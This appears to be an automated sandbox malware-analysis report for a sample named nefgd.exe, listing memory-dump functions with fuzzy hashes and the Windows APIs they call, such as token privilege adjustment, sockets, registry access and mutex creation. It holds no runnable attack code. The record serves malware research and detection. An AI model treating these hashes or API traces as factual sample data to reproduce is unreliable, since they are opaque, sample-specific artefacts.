Instruction ID: 5aabfaa2f25b16d523a35d5eca5f1e366d38a3fe07c1b89bb2dd7fe5e4d175e3
Opcode Fuzzy Hash: 71ff22323cd148e9bbb860028a6d839c459e74a8803f4337b2f184369f0de6a9
Instruction Fuzzy Hash: 7D11D7B5908301AFD340CF19D980A5BFBE4FB88664F04891EF99897311D331EA098FA2

Function 060F351D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4513411058.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_60f0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5774a41946c344f8f824d78d8ab1b9d3417ead02cc5ef82569aef004b3ce2244
Instruction ID: c8de7a935e97ee4976a722e4cc735c0e719b95caccca7bae3760a77b20185dab
Opcode Fuzzy Hash: 5774a41946c344f8f824d78d8ab1b9d3417ead02cc5ef82569aef004b3ce2244
Instruction Fuzzy Hash: 2A11D7B5908301AFD340CF19D980A5BFBE4FB88660F04892EF99897311D331E9098FA2

Function 019312BB Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4464001935.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1930000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f551f863e659709cc6313ed858e9db61321de7a043b65321781fe7e1d552b3
Instruction ID: 675f7fe863ce37928030e84590a3e49896d29bcaf89544555b44185518d416fb
Opcode Fuzzy Hash: 10f551f863e659709cc6313ed858e9db61321de7a043b65321781fe7e1d552b3
Instruction Fuzzy Hash: DD112B3510D3C09FC717CB24D990B55BFB1AF86614F1985EED4898BAA3C33A9806DB52

Function 019305DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4464001935.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1930000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46e07b97881d0bbc03dbde1ebea9c42fb1b2ba7aaf7daaae6ff1380c9c4e9db
Instruction ID: 2191ea98ed1987d9c93a6f6caa1434275dca7bcaaa2170d9e4ba744be254ad2e
Opcode Fuzzy Hash: c46e07b97881d0bbc03dbde1ebea9c42fb1b2ba7aaf7daaae6ff1380c9c4e9db
Instruction Fuzzy Hash: 7501D6B65093846FD7028F15AC40862FFA8EA86220708C5AFEC898B652D225B809CB71

Function 01931398 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4464001935.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1930000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 353069910d9b7990af69e6a81ae0fdd4a1cb8011ced05a6191c04bf1adf0271e
Instruction ID: f3eedd35058e969a4556f217679e95aaafffa5a2c11cb32a5e3b626cad432272
Opcode Fuzzy Hash: 353069910d9b7990af69e6a81ae0fdd4a1cb8011ced05a6191c04bf1adf0271e
Instruction Fuzzy Hash: 35F01D35104644DFC306CF44D980B15FBA6FB89718F24CAADE94917B62C337E813DA81

Function 01930606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4464001935.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1930000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2042e79528e1beb048086a003213b48339dc3a06de04e93d230dd1e438d890
Instruction ID: fcaedb363e54aec123455e7850309079abc7bac93a08ca7eca664f0d76850a3e
Opcode Fuzzy Hash: 8a2042e79528e1beb048086a003213b48339dc3a06de04e93d230dd1e438d890
Instruction Fuzzy Hash: 39E092B66046044BD650DF0AED41452F7D8EB84630708C57FDC0D8BB11D236B509CAA5

Function 060F2B17 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4513411058.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_60f0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cf3d536664fbd0dca7f5be3bfe5d75394fdf9d5dbd6259327e4795e2a04cc07
Instruction ID: 99741cb8aa23cb16fee3425a0b9572f81ee80eaaee0f15624ce1393b5863bfc1
Opcode Fuzzy Hash: 4cf3d536664fbd0dca7f5be3bfe5d75394fdf9d5dbd6259327e4795e2a04cc07
Instruction Fuzzy Hash: 6BE0D8B250020467D2509F069D45F62F798DB40A30F08C557EE081F742E172B61889E5

Function 060F357F Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4513411058.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_60f0000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec7245195105d17be81eda60242618ecdfa5b24f1f63bccdcc2f577d01fb558
Instruction ID: f7ab88cf399bef5acf714320738026b94a8c7a2d926d9eb787b32637346e97a3
Opcode Fuzzy Hash: 0ec7245195105d17be81eda60242618ecdfa5b24f1f63bccdcc2f577d01fb558
Instruction Fuzzy Hash: 55E0D8F264020467D2509E069D45F62FB98DB44930F08C567EE081F741D172B51889E5

Function 017423F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4463026349.0000000001742000.00000040.00000800.00020000.00000000.sdmp, Offset: 01742000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1742000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2f5c85b5f6238e920bcf9051b0968fb2e86573b0de6002bf782a52d0c06559
Instruction ID: f4795e71a52124e41fc499e78cc8f64b09c76b62c03b33f83adb653d70066c75
Opcode Fuzzy Hash: ed2f5c85b5f6238e920bcf9051b0968fb2e86573b0de6002bf782a52d0c06559
Instruction Fuzzy Hash: BED02E393006C04FE3128A0CD2ACBA93BE4AB40704F0A00F9A8008BBA3CB28E8C0C200

Function 017423BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4463026349.0000000001742000.00000040.00000800.00020000.00000000.sdmp, Offset: 01742000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1742000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d0675087771ae154ae604a6fd0874e89382b16caca2825eb84462e9e87e5ee
Instruction ID: 9eeb38a282e4c269b1e2d1dfbc0b2396f04a512218a4e6f063e743d6061fbd34
Opcode Fuzzy Hash: f3d0675087771ae154ae604a6fd0874e89382b16caca2825eb84462e9e87e5ee
Instruction Fuzzy Hash: 56D05E342006814BD715DA0CD2D4F997BE4AB40714F0644E8BC108B762C7A4E8D4CA00

Non-executed Functions

Function 06B33427 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4518196282.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b30000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7bde166cf6e130c28d6cf3ee722400aeb7f9cb4f7840a5059c2e634bef6707c
Instruction ID: 13c6f453f6ca96a650c6eb2ba3ebd7f08486a36a6309614545ba28a2df9991c4
Opcode Fuzzy Hash: e7bde166cf6e130c28d6cf3ee722400aeb7f9cb4f7840a5059c2e634bef6707c
Instruction Fuzzy Hash: A44134A6A5F3E14FCB934B704C612A23FB09E0311475FA0DBC0C0CF6A3E659491AD7A2

Analysis Process: nefgd.exePID: 5856, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	75%
Signature Coverage:	3.1%
Total number of Nodes:	128
Total number of Limit Nodes:	3

Executed Functions

Function 056D253F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 056D25BF

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 399ffc40203e06dce3e5a9bb0b594d039c31e21abd83196972843a3dbc56b22b
Instruction ID: 50e35cd0f298dd52f74458ea7c762047d707c15722d17296f4f941bb44a1e5d1
Opcode Fuzzy Hash: 399ffc40203e06dce3e5a9bb0b594d039c31e21abd83196972843a3dbc56b22b
Instruction Fuzzy Hash: 8321BF755093809FDB128F25DC54F52BFB4EF06310F0888DAE9858B663D271E918DB72

Function 056D2576 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 056D25BF

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ae1a3e5c69ed1ebb4cc051dbf874e82da7c65a619ad5a177006ce828f5717876
Instruction ID: 2cd5c8859f553a41bc32806d54a1f87af3a4fae378bfc4b12a0ab059aba3afdf
Opcode Fuzzy Hash: ae1a3e5c69ed1ebb4cc051dbf874e82da7c65a619ad5a177006ce828f5717876
Instruction Fuzzy Hash: A311CA359002049FDB20CF55C994F62FBE5EF04220F0888AAED468BA22D331E458DB72

Function 00A6A09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00A6A0D5

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: a06fba2848bdc83a7da9acf9b567796502cb3a77a8906c4e336c12bda6d6b5d4
Instruction ID: 50c56e7d9f7761247a4f4f28fd3cf5bb9371ff4304b0ac0d970f5d65dc0f0990
Opcode Fuzzy Hash: a06fba2848bdc83a7da9acf9b567796502cb3a77a8906c4e336c12bda6d6b5d4
Instruction Fuzzy Hash: 6C01DA315002409FDB20CF55D884B62FBF4EF14320F0884AAEE498B612C375E458CFA2

Function 01090F78 Relevance: 1.4, Instructions: 1433COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0931a4f1d5f0510b430adebefc2e049bc499d3a8a6565c1b48abbbd44fdd5af3
Instruction ID: 07cf8823554436bd424f2365ea4076a07c1159563616c799783a65b355bf96db
Opcode Fuzzy Hash: 0931a4f1d5f0510b430adebefc2e049bc499d3a8a6565c1b48abbbd44fdd5af3
Instruction Fuzzy Hash: 8C424331B002018BDF59AB7889243AD36E3AF8435CF158469D5469FBD2EF39DC4AC792

Function 00A6BD62 Relevance: 1.6, APIs: 1, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00A6BE21

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 39f68b4115fd19dac8ed2f9fd256c12cdafcac3df8ac489cf23d101e3bcbbd6a
Instruction ID: 55f0a2cef5343e2ccd7d27344f92459b48e02c6d52fcd94ef6e6ff6d3f9f7661
Opcode Fuzzy Hash: 39f68b4115fd19dac8ed2f9fd256c12cdafcac3df8ac489cf23d101e3bcbbd6a
Instruction Fuzzy Hash: 4831B371505380AFE712CF65DC44BA6BFF8EF06714F08449AE985CB652D375A809C771

Function 056D2047 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 056D211F

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 3801318f6c92adba9240b1bf9e53aa9bbff4daa290a89ab0fea5872b033148c8
Instruction ID: 21fee448d536d07825f37f95cd2bed397fccc0389615b594a39b46c3bd831a59
Opcode Fuzzy Hash: 3801318f6c92adba9240b1bf9e53aa9bbff4daa290a89ab0fea5872b033148c8
Instruction Fuzzy Hash: 8431A5B1509384AFE7218B60CC44FAAFBBCEF05714F04449AFA849B692D375A949CB71

Function 056D17A2 Relevance: 1.6, APIs: 1, Instructions: 100
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 056D1859

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: eda5d9a57614d8c041e78e5ec251f926e22983fe5c22aef02b197173251e4ff4
Instruction ID: 30db144ce626a66ce913999c4f0fb54a3e923cb46df7325e967d6546ac30f308
Opcode Fuzzy Hash: eda5d9a57614d8c041e78e5ec251f926e22983fe5c22aef02b197173251e4ff4
Instruction Fuzzy Hash: 5D3184B1804344AFD722CB51DC44FABBBACEF45314F04899AE9859B652D364A909CBB1

Function 056D03F8 Relevance: 1.6, APIs: 1, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 056D04AA

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: ebd0af2655211b63d53d2bbf68d19815664d37ece5ee341e6425424ea20be030
Instruction ID: f9c549f6e21fe13c9867158aec68d4b74c86747d3a6b734e746f211ab136107b
Opcode Fuzzy Hash: ebd0af2655211b63d53d2bbf68d19815664d37ece5ee341e6425424ea20be030
Instruction Fuzzy Hash: 5D31967140D3C0AFD712CB65CC55F66FFB8AF06220F0885DAE9858B663D365A818C772

Function 056D1134 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 056D11D3

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 674066b4a9b3ec930db3a4a24f6d3505389ac7dc8c2551e1ccbd6a757aa5b8c6
Instruction ID: eb4343c5407a2ba9de5c26e71ece433b0f165b932bb5b9454d338689254760f1
Opcode Fuzzy Hash: 674066b4a9b3ec930db3a4a24f6d3505389ac7dc8c2551e1ccbd6a757aa5b8c6
Instruction Fuzzy Hash: F031C471404344AFEB228F61DC44FABBFBCEF05224F04485AF985CB652D365A509CB71

Function 056D1321 Relevance: 1.6, APIs: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D13D5

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 28d415c315ff4db38f518685584ec23cc79dcd4b18c981b8751f7929876b5e08
Instruction ID: f1cab0824210478469016164c6f580585eee7b540d70690ef156cb415d86091d
Opcode Fuzzy Hash: 28d415c315ff4db38f518685584ec23cc79dcd4b18c981b8751f7929876b5e08
Instruction Fuzzy Hash: C631A071509780AFD722CF50CC44FA6FFB8EF06314F08899AE9858B662D374A808CB71

Function 056D19A2 Relevance: 1.6, APIs: 1, Instructions: 92
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 056D1A4E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3737802eab9d8d8a6d0194349386745aece15b9562b6ff030c6c6dbdf98e4afd
Instruction ID: 72f4df753c49c4b91a0451edae10fec5883aa6511ba18ff09c9a0a22959cd075
Opcode Fuzzy Hash: 3737802eab9d8d8a6d0194349386745aece15b9562b6ff030c6c6dbdf98e4afd
Instruction Fuzzy Hash: 0231A771409384AFD722CB60DC44FA6FFB8EF06314F08889AE9848B653D375A949C771

Function 00A6B6CD Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 00A6B788

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ac34b0229ca6f10d5e1d45d24bbc882275785cc94ad75a0f8f001fd21fe2bedb
Instruction ID: 41deeb6e522da245720954627f0bccb809c9859ef4b0bf9b6941123cd67a8deb
Opcode Fuzzy Hash: ac34b0229ca6f10d5e1d45d24bbc882275785cc94ad75a0f8f001fd21fe2bedb
Instruction Fuzzy Hash: 1E31AF761093849FD722CF21CC44FA6BFB8EF46314F08849AE985CB652D364E948CB71

Function 056D0820 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 056D08B7

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: f07209b89b100922aeeb8a202d45854141cfd5a1c352436d5ea8c2a9f14aba22
Instruction ID: 3e5f18042ab04a3f255452365862b4c8b4dff5679b6c379c3046f9154dd55559
Opcode Fuzzy Hash: f07209b89b100922aeeb8a202d45854141cfd5a1c352436d5ea8c2a9f14aba22
Instruction Fuzzy Hash: E9318471509384AFE721CB65DC45FABFFACEF05224F08849AE945CB652D364E808CB71

Function 056D0722 Relevance: 1.6, APIs: 1, Instructions: 87
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D07CC

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 539b238f338e393c26816c82151aedd4e0fa986634ae4ca04cb1f2d45ae0d940
Instruction ID: ef8499d0e29fb6ec8b611d8ef2241bd63d60f0cbb8300e4db30d8424957fb90d
Opcode Fuzzy Hash: 539b238f338e393c26816c82151aedd4e0fa986634ae4ca04cb1f2d45ae0d940
Instruction Fuzzy Hash: B33180764093806FD722CB65CC44F96FFF8EF06224F0884DAE9858B663D264A949CB71

Function 056D1231 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ioctlsocket.WS2_32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D12D7

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 7974dbd9b650d18c88a4f7474d891b5621a130a9d14545d60d052b46457b5e56
Instruction ID: 813e962b808f3ebea7fec34209631b16aa00c30ab4c26595d8e8d927ac824465
Opcode Fuzzy Hash: 7974dbd9b650d18c88a4f7474d891b5621a130a9d14545d60d052b46457b5e56
Instruction Fuzzy Hash: 2131B1714097C46FD712CB20CC45FA6BFB8EF46310F0988DAE9858F663C265A908C771

Function 056D0AC2 Relevance: 1.6, APIs: 1, Instructions: 87
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 056D0B6A

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: cbfb0603bce114b30eb0836aa85aee2513e2d1124c20f6fdb1792f305b527da5
Instruction ID: b1c9a047b6eeef2e40ce9abcfdab5c938a8d8c005ae28b59428477d42e0c8a42
Opcode Fuzzy Hash: cbfb0603bce114b30eb0836aa85aee2513e2d1124c20f6fdb1792f305b527da5
Instruction Fuzzy Hash: ED31E472409380AFD712CF61CC44F96FFF8EF0A214F08489EE9848B652D365A509C772

Function 00A6B5D9 Relevance: 1.6, APIs: 1, Instructions: 86
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 00A6B685

Memory Dump Source

Source File: 00000004.00000002.2461443272.0000000000A6A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a6a000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 302c3259790240665dbb8a936c1f0782af1488e60a05ae054b395e95fd90ec20
Instruction ID: 0e5d7653d9bd1ab0d1b9f328c38c3717fa692193b20fca04af2da62e8c53bbd1
Opcode Fuzzy Hash: 302c3259790240665dbb8a936c1f0782af1488e60a05ae054b395e95fd90ec20
Instruction Fuzzy Hash: E5218471404384AFE7218F51CC84FABFBBCEF05314F08859AE9858B652D365E948CB75

Function 056D0D6D Relevance: 1.6, APIs: 1, Instructions: 85
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 056D0E0D

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 21274231e2ae45f2aed8f4d9c59b18753e7ca4b2385b8ea1989b74c25f71e680
Instruction ID: 21498ea014c64dba1b9865de31fe1724e2211f2288d792b0fa8f2382d74bf870
Opcode Fuzzy Hash: 21274231e2ae45f2aed8f4d9c59b18753e7ca4b2385b8ea1989b74c25f71e680
Instruction Fuzzy Hash: 633184B1509380AFE711CB65CC49F96FFF8EF05224F08889AE985CB652D365E948CB71

Function 056D207A Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 056D211F

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 1e771a6467dfdb7b6b06088ea114ee415238729f54c1dfbe3221e55f38d70671
Instruction ID: c3b90ca122ff9a47efe5576c953d802a213ddafbe0a1d9e261f1c43adc992171
Opcode Fuzzy Hash: 1e771a6467dfdb7b6b06088ea114ee415238729f54c1dfbe3221e55f38d70671
Instruction Fuzzy Hash: EB21D172504244AFEB21DF60CC84FAAFBACEF04714F04885AFA489B681D774A549CBB5

Function 056D1036 Relevance: 1.6, APIs: 1, Instructions: 84
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessTimes.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D10C9

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 53a9785cf50aa3c5a09b919861f662f73289867f38d67885f0f0649c3b04dca6
Instruction ID: 5a42e25cc417c5af768f1d8a531728ec9c2a0497427be9a43942a11805fad712
Opcode Fuzzy Hash: 53a9785cf50aa3c5a09b919861f662f73289867f38d67885f0f0649c3b04dca6
Instruction Fuzzy Hash: CD21B472509380AFD722CF61CC45FA6FFB8EF46210F08889AE985CB552D365A848CB75

Function 056D18AE Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNELBASE(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D1958

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: abce8b27a8009aa6745a4b3feebe295df4502c0e6ae33edd6bef807b231a22b9
Instruction ID: 95163af89e083fde39ff02f921f2c04e08745bf7b43b97226e75b6ca20f51c80
Opcode Fuzzy Hash: abce8b27a8009aa6745a4b3feebe295df4502c0e6ae33edd6bef807b231a22b9
Instruction Fuzzy Hash: B431D5714093846FEB22CF50DC44FA6FFB8EF46314F08889AE9859B552D374A509C7B1

Function 056D16B4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 056D174D

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_56d0000_nefgd.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: ebe91fbf341f90a91a4d7d3aab798114002d4aecaf73a3f1ade9bbc3fe7b8855
Instruction ID: 4652a70cb60461746ef1fa050cba0f13dca2c342245dcc36a6f44976a1199db8
Opcode Fuzzy Hash: ebe91fbf341f90a91a4d7d3aab798114002d4aecaf73a3f1ade9bbc3fe7b8855
Instruction Fuzzy Hash: BF21A275409384AFE7228B209C44FAAFFB8EF46314F0884DAE9448B653D264A90DCB71

Function 056D27AD Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,BB9F72D8,00000000,00000000,00000000,00000000), ref: 056D283E

Memory Dump Source

Source File: 00000004.00000002.2462400084.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056D0000, based on PE: false

